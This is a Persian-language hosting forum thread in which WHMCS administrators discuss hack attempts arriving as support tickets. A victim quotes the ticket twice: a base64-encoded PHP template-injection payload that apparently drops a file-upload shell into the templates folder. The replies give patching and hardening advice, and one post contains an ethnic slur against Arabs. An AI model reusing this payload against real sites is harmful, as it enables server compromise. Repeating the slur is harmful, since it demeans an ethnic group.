-
December 21st, 2011, 11:06
پاسخ : گرفتن حال اساسی هکر whmcs
سلام دوستان از دیروز 3 بار این تیکت رو برام فرستادن
میخواستن هکم کنن
اما به بن بست خوردن مثل اینکه
کد HTML:
<form method="post">
<textarea name="TextArea1" style="width: 653px; height: 82px">: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php</textarea></form>
درست حدس زدم ؟
-
-
December 21st, 2011 11:06
# ADS
-
December 21st, 2011, 11:15
عضو انجمن

نوشته اصلی توسط
mehdi.gh
سلام دوستان از دیروز 3 بار این تیکت رو برام فرستادن
میخواستن هکم کنن
اما به بن بست خوردن مثل اینکه
کد HTML:
<form method="post">
<textarea name="TextArea1" style="width: 653px; height: 82px">: {php}eval(base64_decode('JGNvZGUgPSBiYXNlNjRfZGVjb 2RlKCJQRDl3YUhBTkNtVmphRzhnSnp4bWIzSnRJR0ZqZEdsdmJ qMGlJaUJ0WlhSb2IyUTlJbkJ2YzNRaUlHVnVZM1I1Y0dVOUltM TFiSFJwY0dGeWRDOW1iM0p0TFdSaGRHRWlJRzVoYldVOUluVnd iRzloWkdWeUlpQnBaRDBpZFhCc2IyRmtaWElpUGljN0RRcGxZM mh2SUNjOGFXNXdkWFFnZEhsd1pUMGlabWxzWlNJZ2JtRnRaVDB pWm1sc1pTSWdjMmw2WlQwaU5UQWlQanhwYm5CMWRDQnVZVzFsU FNKZmRYQnNJaUIwZVhCbFBTSnpkV0p0YVhRaUlHbGtQU0pmZFh Cc0lpQjJZV3gxWlQwaVZYQnNiMkZrSWo0OEwyWnZjbTArSnpzT kNtbG1LQ0FrWDFCUFUxUmJKMTkxY0d3blhTQTlQU0FpVlhCc2I yRmtJaUFwSUhzTkNnbHBaaWhBWTI5d2VTZ2tYMFpKVEVWVFd5Z G1hV3hsSjExYkozUnRjRjl1WVcxbEoxMHNJQ1JmUmtsTVJWTmJ KMlpwYkdVblhWc25ibUZ0WlNkZEtTa2dleUJsWTJodklDYzhZa jVWY0d4dllXUWdVMVZMVTBWVElDRWhJVHd2WWo0OFluSStQR0p 5UGljN0lIME5DZ2xsYkhObElIc2daV05vYnlBblBHSStWWEJzY jJGa0lFZEJSMEZNSUNFaElUd3ZZajQ4WW5JK1BHSnlQaWM3SUg wTkNuME5DajgrIik7DQokZm8gPSBmb3BlbigidGVtcGxhdGVzL 2p4aC5waHAiLCJ3Iik7DQpmd3JpdGUoJGZvLCRjb2RlKTt=')) ;{/php</textarea></form>
درست حدس زدم ؟
واسه من تیکت نیومده . دیشب مستقیم وارد هاست شده بودن . فایل whmcs رو که دیشب تو زیپ گذاشته بودم رو الان دانلود کردم رو پی سی . فابل رو با ویروس کش اسکن کردم . ویروس کش کل زیپ رو پاک کرد احتمالا کل فایل ها مشکل پیدا کردن .
-
تعداد تشکر ها از vps-baran.ir به دلیل پست مفید
-
December 21st, 2011, 11:20
ورژن جدید رو نصب کنید
بعد هم اون سه تا پوشه رو ببرید تو قبل از روت بذارید
دیگه هیچ مشکلی نیس
خودتونم به خودتون از این تیکت ها بزنید
سوپرایز : دانلود whmcs v5.0.3 و قالب شمسی و راست چین دیفالت
-
-
December 21st, 2011, 11:29
من که هم پچ رو گذاشتم
هم دسترسی فایل supportticket رو صفر کردم
بازم کاری که maryam1 گفتن انجام میدم
-
-
December 21st, 2011, 11:34
پچ رو بیخیال ورژن جدیدو بچسب یه نکنه تو ورژن جدید فایل function.php داخل پوشه اصلی حذف شده و فقط داخل include هست
اونو باید حذف کنید
پچو بیخیال حتما ورژن جدیدو نصب کنید و ایل function.php رو از محل نصب whmcs حذف کنید
اون سه پوشه رو هم ببرید پشت روت
من در طول روز 15 تا برام ازین تیکت ها میاد منم دارم بانک اطلاعاتی آیپی جمع میکنم
کلا یه وسیله سرگرمی شده برام
-
تعداد تشکر ها از maryam1 به دلیل پست مفید
-
December 21st, 2011, 11:45
عضو انجمن

نوشته اصلی توسط
maryam1
پچ رو بیخیال ورژن جدیدو بچسب یه نکنه تو ورژن جدید فایل function.php داخل پوشه اصلی حذف شده و فقط داخل include هست
اونو باید حذف کنید
پچو بیخیال حتما ورژن جدیدو نصب کنید و ایل function.php رو از محل نصب whmcs حذف کنید
اون سه پوشه رو هم ببرید پشت روت
من در طول روز 15 تا برام ازین تیکت ها میاد منم دارم بانک اطلاعاتی آیپی جمع میکنم
کلا یه وسیله سرگرمی شده برام
حالبش اینه که همشون با وی - پی - ان وارد می شن که شناسایی نشن
-
-
December 21st, 2011, 11:47
من رو یه هفته پیش عرب های ....... هک کرده بودن
-
-
December 21st, 2011, 11:49
عضو دائم
نمایش مشخصات: badnam_051 - انجمن تخصصی وب هاستینگ ایران
ادمین بلک هت گروپ در وبهاستینگ تالک . میتونید از نزدیک ارتباط برقرار کنید اما شواهد نشون میده که این دیفیس کار این تیم نبوده به 2 دلیل :
1. این دیفیس پیج رسمی این تیم نیست
2.اسامی کسانی که در عکس بودند عضو رسمی این تیم نیستند
بازم باهاشون صحبت کنید اگر از طرف این تیم باشه برای پچ کردن باگ امنیتی موجود در سایتتون بهتون کمک میکنن
اینقدر هم روی whmcs حساس نباشید
موفق باشید
کاربر عزیز مشخصات سرور خود را بدون هماهنگی در پیغام خصوصی ارسال نفرمایید .
مدیریت سرور های اختصاصی و مجازی همچنین خدمات مجازی سازی و کلودکامپیوتینگ انجام میشود.
YAHOO -
GMAIL
-
تعداد تشکر ها از--- به دلیل پست مفید
-
December 21st, 2011, 11:50
عضو انجمن

نوشته اصلی توسط
mehdi.gh
من رو یه هفته پیش عرب های ....... هک کرده بودن

بابا باز اون عرب کث یف بوده . ولی یه ایرانیه بیاد . بخواد با هم وطن خودش این کارو کنه خیلی زورش . میاد . حالا تو سایت خودشون زدن که ما از فقط سایت های خارجی رو هک می کنیم
-
تعداد تشکر ها ازvps-baran.ir به دلیل پست مفید
-
December 21st, 2011, 12:02
آره والا
حالا بیاد هک کنه
من که دیگه بک آپ روزانه میگیرم
-